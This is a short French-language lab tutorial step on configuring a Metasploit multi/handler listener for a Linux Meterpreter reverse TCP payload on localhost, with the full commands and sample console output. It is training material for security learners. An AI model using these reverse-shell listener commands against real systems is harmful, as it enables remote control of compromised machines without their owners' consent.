Configuration d'un listener Meterpreter
Dans cette dernière étape, vous apprendrez à configurer un listener pour un payload Meterpreter. Meterpreter est un payload avancé et riche en fonctionnalités qui fournit un shell interactif sur le système cible. Au lieu de lancer un exploit, vous utiliserez le module exploit/multi/handler pour écouter les connexions entrantes. Ceci est utile lorsqu'un exploit est délivré par d'autres moyens (par exemple, un fichier malveillant) et que vous devez intercepter la connexion inverse.
Tout d'abord, passez au module multi/handler.
use exploit/multi/handler
Votre invite changera pour refléter le nouveau module.
msf6 exploit(multi/handler) >
Ensuite, définissez un payload Meterpreter. Nous en utiliserons un conçu pour les systèmes Linux. Le nom du payload linux/x86/meterpreter/reverse_tcp suit une structure logique : <plateforme>/<architecture>/<type>/<protocole>. Il spécifie une plateforme Linux, une architecture x86, un type de payload Meterpreter et un protocole de connexion reverse TCP.
set payload linux/x86/meterpreter/reverse_tcp
Maintenant, configurez les options du listener, LHOST et LPORT, exactement comme vous l'avez fait précédemment.
set LHOST 127.0.0.1
Remarque : Vous pourriez voir un message d'avertissement concernant la liaison à une adresse de bouclage (loopback). C'est normal lors de l'utilisation de localhost (127.0.0.1) et peut être ignoré sans risque pour ce laboratoire.
set LPORT 4444
Enfin, démarrez le listener en utilisant la commande exploit.
exploit
Metasploit démarrera un listener sur l'adresse IP et le port spécifiés, en attendant qu'une session Meterpreter se connecte.
[*] Started reverse TCP handler on 127.0.0.1:4444
La console restera active, en attente d'une connexion. Dans un scénario réel, si une machine cible exécutait le payload Meterpreter correspondant, une session serait établie ici. Comme aucune cible ne se connectera dans ce laboratoire, vous pouvez arrêter le listener en appuyant sur Ctrl + C.
Pour quitter la console Metasploit, tapez exit et appuyez sur Enter.